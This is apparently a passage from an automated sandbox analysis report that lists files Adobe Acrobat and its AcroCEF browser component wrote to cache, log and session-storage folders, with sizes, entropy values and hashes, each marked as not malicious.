SHA-512: | 081136B7180607D84C9E19C63CD6BBAB242D6E811C03FB69E098A5616790E7269B35F40E487689C50291C07BA9FC9A986CFC3293BA03844ABA1BEBF7B6DB8E27 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 297 |
Entropy (8bit): | 5.18025762170407 |
Encrypted: | false |
SSDEEP: | 6:iO4qzxf+q2PcNwi2nKuAl9OmbnIFUtSqzxxNZZmwsqzxwtVkwOcNwi2nKuAl9Omt:7/mvLZHAahFUtBXZ/Tk54ZHAaSJ |
MD5: | 29DA8185214287990ECAF5F614FBE799 |
SHA1: | E93FE6627D1EBB2BE6C424869F7B35CA965075B2 |
SHA-256: | E270A130B844629150872D6800AE156671E9F93734731A20117446CE565B1CCD |
SHA-512: | BBDCC60CB9FC4326C837842360D265ED7E8C8BF89C3D9C1A0F2BAE01897A0A8D1F4D32876147CC252422583C2AFB3A67612054B061CBA38C6367E911DCE3A8A5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 297 |
Entropy (8bit): | 5.18025762170407 |
Encrypted: | false |
SSDEEP: | 6:iO4qzxf+q2PcNwi2nKuAl9OmbnIFUtSqzxxNZZmwsqzxwtVkwOcNwi2nKuAl9Omt:7/mvLZHAahFUtBXZ/Tk54ZHAaSJ |
MD5: | 29DA8185214287990ECAF5F614FBE799 |
SHA1: | E93FE6627D1EBB2BE6C424869F7B35CA965075B2 |
SHA-256: | E270A130B844629150872D6800AE156671E9F93734731A20117446CE565B1CCD |
SHA-512: | BBDCC60CB9FC4326C837842360D265ED7E8C8BF89C3D9C1A0F2BAE01897A0A8D1F4D32876147CC252422583C2AFB3A67612054B061CBA38C6367E911DCE3A8A5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 335 |
Entropy (8bit): | 5.155684632447782 |
Encrypted: | false |
SSDEEP: | 6:iO4qzxUWUFd3+q2PcNwi2nKuAl9Ombzo2jMGIFUtSqzxUW3NAgZmwsqzxUWWFX9f:7/UWcovLZHAa8uFUtBUW3Sg/TUWWF54y |
MD5: | AE8108438025E872100FE02889A8FE15 |
SHA1: | 84080E64EDF89B78E250B9CE12FF5C607E345EB7 |
SHA-256: | A3E927AAB9DCBFCA6842B20C1BBE6ECFF8AD055AC0E7B9859D633450419C22FE |
SHA-512: | 56D5F0827A49D62E8A3FBD4FFB7AFE05194860578D1A335D883D5CE7FA804D203C7C8541FF274C5C1ECB2CA5F3AE769E21ABFFA8EF24727A2546E98851D80848 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 335 |
Entropy (8bit): | 5.155684632447782 |
Encrypted: | false |
SSDEEP: | 6:iO4qzxUWUFd3+q2PcNwi2nKuAl9Ombzo2jMGIFUtSqzxUW3NAgZmwsqzxUWWFX9f:7/UWcovLZHAa8uFUtBUW3Sg/TUWWF54y |
MD5: | AE8108438025E872100FE02889A8FE15 |
SHA1: | 84080E64EDF89B78E250B9CE12FF5C607E345EB7 |
SHA-256: | A3E927AAB9DCBFCA6842B20C1BBE6ECFF8AD055AC0E7B9859D633450419C22FE |
SHA-512: | 56D5F0827A49D62E8A3FBD4FFB7AFE05194860578D1A335D883D5CE7FA804D203C7C8541FF274C5C1ECB2CA5F3AE769E21ABFFA8EF24727A2546E98851D80848 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\0227fa4e-a09c-4b96-96dd-930a654e9ab5.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF69d785.TMP (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\ef2da0b4-3c0a-46fb-b9c5-7d6dbb6aae56.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.9655162853550765 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8squV2sBdOg2HWfcaq3QYiubSpDyP7E4T3y:Y2sRds1dMHx3QYhbSpDa7nby |
MD5: | 7F49F5F68E46CA75CEA6AF9CE5AF4BCF |
SHA1: | 9607A2AB84A4F8596EAEC0915C85688B733E3D3B |
SHA-256: | 21F468194B6654238191308753F09FAD01242F43C41DCB7B9BB2AC942AC0061A |
SHA-512: | D8C33A3B8FE569BACBF714DB9DACE9BA7CBB7B2C8389E5E956FEA37B39DE553609B47A198ED09870FD0A0DE200C4F1ED79CC44CA8EACDBCE47EE12D07131AC79 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.231221660492776 |
Encrypted: | false |
SSDEEP: | 96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPPDoG4peY:CwNw1GHqPySfkcigoO3h28ytPboG4peY |
MD5: | FE00023E3791476EA69ADDEB95526B62 |
SHA1: | 00567DB4730B5CEC3D03FADA2B0D788B25CEC6C6 |
SHA-256: | 4A8824CC538F72D1D0F1DF4E2CFFD64AC025A0089D6C156EA4565BD2BB756CD2 |
SHA-512: | 1C5EF98AC3A8269F3F3846D0923229B5272AAAEA41DAE3BE85E565812EA8EB3B07CD3A12272B7E4EAB315DC6BEE15E16DAA9690F48D1609CDFD37456C33D5CE7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 323 |
Entropy (8bit): | 5.1851843624132865 |
Encrypted: | false |
SSDEEP: | 6:iO4qzxAN+q2PcNwi2nKuAl9OmbzNMxIFUtSqzxnZmwsqzxHVkwOcNwi2nKuAl9Ob:7/AIvLZHAa8jFUtBn/T154ZHAa84J |
MD5: | 987E597AB0F3F3C6699F369746B6A507 |
SHA1: | D8A4690639910901E26D5FAC75130B4108169180 |
SHA-256: | BE60A961EFF0BDD1374094CDA4937EE921BFCB86AA6572436CCCD7F2A84C58E0 |
SHA-512: | 99CECAB7DC21E72FB84359D92749D9C2CB0E34B0002D8946CEFD7014BEB42054FE676A3B2B8C8037AA9F06113DF8A9D0A25B5CC879DED7C7AF165A2F0E1A2EB2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 323 |
Entropy (8bit): | 5.1851843624132865 |
Encrypted: | false |
SSDEEP: | 6:iO4qzxAN+q2PcNwi2nKuAl9OmbzNMxIFUtSqzxnZmwsqzxHVkwOcNwi2nKuAl9Ob:7/AIvLZHAa8jFUtBn/T154ZHAa84J |
MD5: | 987E597AB0F3F3C6699F369746B6A507 |
SHA1: | D8A4690639910901E26D5FAC75130B4108169180 |
SHA-256: | BE60A961EFF0BDD1374094CDA4937EE921BFCB86AA6572436CCCD7F2A84C58E0 |
SHA-512: | 99CECAB7DC21E72FB84359D92749D9C2CB0E34B0002D8946CEFD7014BEB42054FE676A3B2B8C8037AA9F06113DF8A9D0A25B5CC879DED7C7AF165A2F0E1A2EB2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.43856088940002 |
Encrypted: | false |
SSDEEP: | 384:Se/ci5GgiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:wMurVgazUpUTTGt |
MD5: | F6C89D88E35E31E8F9312CB4F1670982 |
SHA1: | 953FC8C70C847A128C4FE1E60EADEA97CDFA5986 |
SHA-256: | B355CFD880DBE9F3B3DD6079BBAD528665D3D1F35D31F1906C3DAD4B9CAEB505 |
SHA-512: | 84225E0D244B7A4C0780FB229FC334D8248C91C91569A56B843DF202CE66CEDA35A1CB18FBE6FB5B47211C4443CB106AA35EF771671F6A79805EC6F222C86E35 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.214076389041979 |
Encrypted: | false |
SSDEEP: | 24:7+tgZ6wKB3zqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9v:7M2WBzqvmFTIF3XmHjBoGGR+jMz+LhF |
MD5: | 0327DAE8B14E7F3EB779AA164FF051E9 |
SHA1: | 11B3952DB76491DA6DFEC16786D66B763A619691 |
SHA-256: | 6EC4F907F5D4A95D2B262763A451D388314B98FB79AF28360A6EE8D7AFBEF466 |
SHA-512: | C9B8C2A83852C034DF57FE6F6744EB35242130C0E5AA9C70E031759F7B7E251DDEB2BCFB6607C1FA76BF205FD679ADBE466CB20565D9F87C2D09CD3492BAEE10 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7321365340992054 |
Encrypted: | false |
SSDEEP: | 3:kkFklQdVN/ltfllXlE/HT8kVhvNNX8RolJuRdxLlGB9lQRYwpDdt:kKJneT8A3NMa8RdWBwRd |
MD5: | 095D7CFAE7E1EFA8D84999961CFF436C |
SHA1: | 6B14DF6BC7228FF2012F3CC496E14F140E1BF641 |
SHA-256: | 76D19D4C894E253AD77EC2EB4CEB34A0D91A7A396F25BFC26F916A8FB127E4C3 |
SHA-512: | F80C31C7DC197F8F3E6F75006B1B8AF68918219DD208217FE6F4F90A9639C0D3849FC3F120F46B00F03B3A29B3CF826A478430F7EFDD52A0DA962DC0CBAEFA62 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.242990426783058 |
Encrypted: | false |
SSDEEP: | 6:kKfDL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XDiDImsLNkPlE99SNxAhUe/3 |
MD5: | 16F2257A3D20A357939EEE918C198C6D |
SHA1: | 255F415C2D0E697FE3EA48A3E9F62EB14C2F62B8 |
SHA-256: | AEFAAFF0BC1D72BC72793F57AAEAE8913BA9671881C8FB815F0766AAE1CCFC2E |
SHA-512: | 6874E866EFDCC31F8784BEF8B08D8E7CAB54EE24BDEFC3864814FBAD3A7B2709EC08B747627DF48C4B68C1D3A852A5C2C1437A78093D9EAC79C03D5E42530F4E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.348663966991816 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJM3g98kUwPeUkwRe9:YvXKXxxBDsdTeOvGMbLUkee9 |
MD5: | 7603F25540649F0EF76A960BB1021016 |
SHA1: | DF1E8CDA5243F30F8571BFE2EBB305AE5983F0A7 |
SHA-256: | 8CD6EF03184DB7B95C0DFF4A769BA842021B307028F7E435956C7ECD9B310283 |
SHA-512: | 40DCE508EC405990468C1B052C05F34D1CFEAF4EC1349274D4BD05CCC10DBBFF789AF4577B2DF96E4E642DA8DA353275F50C7536F9A652A702DD5E15E8021131 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.284671483307161 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJfBoTfXpnrPeUkwRe9:YvXKXxxBDsdTeOvGWTfXcUkee9 |
MD5: | 2D5F4945FCF07273302CD14C5D3E2EED |
SHA1: | 738931F031203A295EF486A2277DCF08608862F8 |
SHA-256: | 31E9CDD799F4ABF3354BAE4500147728AB61236E8393D1C4D1EB031A98A78549 |
SHA-512: | 19E71BCB786A8AC23F9C3BDA122DC6A3D2707263345C36D3F23E3978942581D6128D18F2A48E40EB26A988242477A41201371654C5764FA0070456C7635D1B91 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.2629309786649685 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJfBD2G6UpnrPeUkwRe9:YvXKXxxBDsdTeOvGR22cUkee9 |
MD5: | 0B1E02809F0BDC7CE3C2CE857951A2B5 |
SHA1: | A18EDB5FEF01A33A832023E84116C67CDC6A6650 |
SHA-256: | F0FEE7F43EBAC3095913B62F4477FF8FB75F2C92F30784D90C8FFE4C12D1CB7D |
SHA-512: | 1CBC100C781C6CAA531E0703E8C7169483A410E7A108718ECF80C29F282067A552EC50732AC21CC69B0E39D5D02188400B9EDA4AECAE3F6CA00334DF5484057C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.335026501047494 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJfPmwrPeUkwRe9:YvXKXxxBDsdTeOvGH56Ukee9 |
MD5: | 66B754CA04D5C7C26E2274B3590CCED8 |
SHA1: | 8803005E07EC7808F48C81A0FDE505EDCE620D00 |
SHA-256: | D6336BD486BDC8AA12A06D295928B0DE4D7151A5EDEDFF8F5277705E24716025 |
SHA-512: | 7B045AD6851732C3C827294811D8EC2F0E3F0DB7E57F6E5D1B35B6E9B57116A4CA3A91E7C4D4D1FA78161B398AC1128EB29B044EEB9CA5137A57881F4A2B69DF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.686517205153813 |
Encrypted: | false |
SSDEEP: | 24:Yv6XlmeO0pLgE9cQx8LennAvzBvkn0RCmK8czOCCSu:YvNeDhgy6SAFv5Ah8cv/u |
MD5: | 2B2A9972E80E61C102D16C012802CF91 |
SHA1: | 62DF633CB1A11561DE5EAA8764E79F9DA20822D4 |
SHA-256: | 96C1EDA3E89BC58A9B63F71A9A4F0B36F2EA52B1778567202FE99FADDA1EC916 |
SHA-512: | 8C21B4A2AE3FD7D35CF82BAE056622AE3A0C23DF86DF6AD3FFAD5F6AF72510EC33F4824865325EAD70F8CF7CAB8BE427557AAA20E0C08A3EE2D30ACECDDFF7E3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.269575603035033 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJf8dPeUkwRe9:YvXKXxxBDsdTeOvGU8Ukee9 |
MD5: | DE14115F4119382F88D6E27FA16663D2 |
SHA1: | CD038F6E36909AAFD7E0F7264819CDE3FB2B0533 |
SHA-256: | 60B6CD473FB2654CA2518702EFFC9F2A10452629A43CC2FFBB5B77364D019B42 |
SHA-512: | C09B5E4DA311DD43D2E3B88A2FA0501CBC3FD0B2C7257D6B7F9128012208AE0307BAB4DA3C0A8B20B8823DEFE93F1A453F0E1CEEC2976D8BED15BDD0D09FFE17 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.275152342404903 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJfQ1rPeUkwRe9:YvXKXxxBDsdTeOvGY16Ukee9 |
MD5: | 8FCB202D31B1C38B9C14550D055983B6 |
SHA1: | 0CB700D508ACF2B164E840BE53ED300FDCE4BFDC |
SHA-256: | 6D634532B5AA0CF1EF626AD7A35977C4D5204C2B25FD8EC5BC2DC0A4DCB29A9E |
SHA-512: | 38EC61BF2E97D4F7C5BD2230F95BC6C9DE4E7C4B8841B3C63092EE568CDCD765C508C1812B6CA2E1107B345D0585F8ADB74A45EE8A02EF48D65F196C855BFB80 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.289036808094338 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJfFldPeUkwRe9:YvXKXxxBDsdTeOvGz8Ukee9 |
MD5: | A927552D8D0EA3E848B63AC3A2D09064 |
SHA1: | 2DD76C0A96AFC9FDE69903AE3BBD5C1EB3A6DA38 |
SHA-256: | A3A7E07716E75458A8BF0418EC1512A604119B2803A663422F2380797DFD8562 |
SHA-512: | CA67119059C95F6A0C82526C295B69FE144E649F0AAE6F1207563ACEE28A9514694CBA85A7E471A1EE15669582856270C653D24D912B285F4F1E884F2F747D8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.295607359313432 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXxTJGUBQWsGiIPEeOF0YsxoAvJfzdPeUkwRe9:YvXKXxxBDsdTeOvGb8Ukee9 |
MD5: | EE808219C6A5ED03F82D8A997C5B153E |
SHA1: | 84DB77FAA011BB3F8B63A132CCA8D12599038F00 |
SHA-256: | 09787667BF2D45EEA0C106B400E20380605E46A9A76921C221C3C86D231AA385 |
SHA-512: | 4CB99C637826F12FD78D82A8E8322A6C1987F25A4CB076E503DBC5F107187B327AF7253C329365C234853B3B0BD3EE17A47A889A08C7FF2A118DC3C16422273F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
